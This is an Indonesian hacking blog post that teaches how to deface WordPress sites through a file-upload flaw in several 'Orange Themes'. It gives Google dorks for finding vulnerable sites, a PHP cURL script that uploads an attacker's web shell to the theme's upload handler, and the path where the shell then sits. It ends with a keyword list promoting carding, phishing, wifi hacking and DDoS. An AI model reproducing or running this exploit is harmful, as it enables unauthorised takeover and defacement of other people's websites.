Cara Deface Dengan Exploit Orang Themes File Upload

Posted by IHC-Team

Assalamualaikum karena saya udah lama gk share tutor di karenakan Sibuk dengan sekolah, mumpung ada waktu luang mau share tutor.. ;)
Exploit orange themes File Upload

Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell

Langkah-Langkah:
1).Search Di Google Gunakan Dork

inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"

2).Ane Pkek Dork Yang inurl:"/wp-content/themes/radial-theme/"

3).Jika Ketemu Masukan Exploit /wp-content/themes/radial-theme/functions/upload-handler.php jika Keluar Error Situsnya Vuln

4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D

<?php
$uploadfile="shellKamu.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

5).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D

6).Aktifkan XAMPP Klik Start Pada Apache

7).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
8).Ketik cd\xampp/php

9)ketik php namascript.php Contoh: php lol.php
10).Jika Succes Akan Ada Nama Shellnya :D

11).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/2013/11/namashell.php

keyword

cara carding - cara carding paypal - belajar carding - how to carding paypal - cara carding - indonesia hacker - software - freeware - cyber news -trik komputer - antivirus - tukar link - pasang iklan murah - pasang iklan murah via pulsa - cara hack wifi - cara hack wifi mikrotik - how to hack wifi - cara carding havij - deface dengan mudah - virus - anonghost - deface website - deface upload - deface dengan mudah - cara deface - cara hack fb - sejarah hacking - sejarah blog - sejarah komputer - sejarah deface - cara melakukan ddos - cara menjadi hacker - cara jadi hacker - cara order carding - cara deface upload - tutorial - cara tamper data - cara melakukan keyloger - keyloger - cara hack komputer - metasploit - cara melacak - indonesia hacker - hacker hebat indonesia - hacking cracking - software hacker - deface joomla - jumping - sqlmap - windows - kali linux -mengamamkan web - trojan - malware -mencegah site dari hacker - shell - deface for newbie - cara deface index - dork terbaru - dork bagus - havij pro - top hacking - tools hack - ddost attack - server - fake root keylog - hack biling warnet - warnet - biling - deface kindeditor - membuat web phising - hack fesbook -hack cms balitbang - cara deface sql manual - havij pro -hack pasword wifi - symlink - exploit joomla -pogram - istilah - hack - blog - komputer - virus - indonesia hacker cyber - komputer hack - berita - Cara mengecilkan file - cara kompres file - file - kompres - ukuran - blogger - pasang iklan - hack ddos - root - ip addres -

Unknown mengatakan...: enggak work mas; 11 Desember 2014 pukul 22.51

Posting Komentar

~ SEBELUM KOMEN , PERHATIKAN PERATURAN KOMENTAR DI SINI ~

1. Dilarang Komentar Dengan Kata Kasar , PROMOSI , SARA , PORNOGRAFI , SPAM , dan Hal-Hal yg tidak bagus
2. Dilarang koment dengan LINK aktif contoh WEBSITE , BLOG

IHC-Team

Search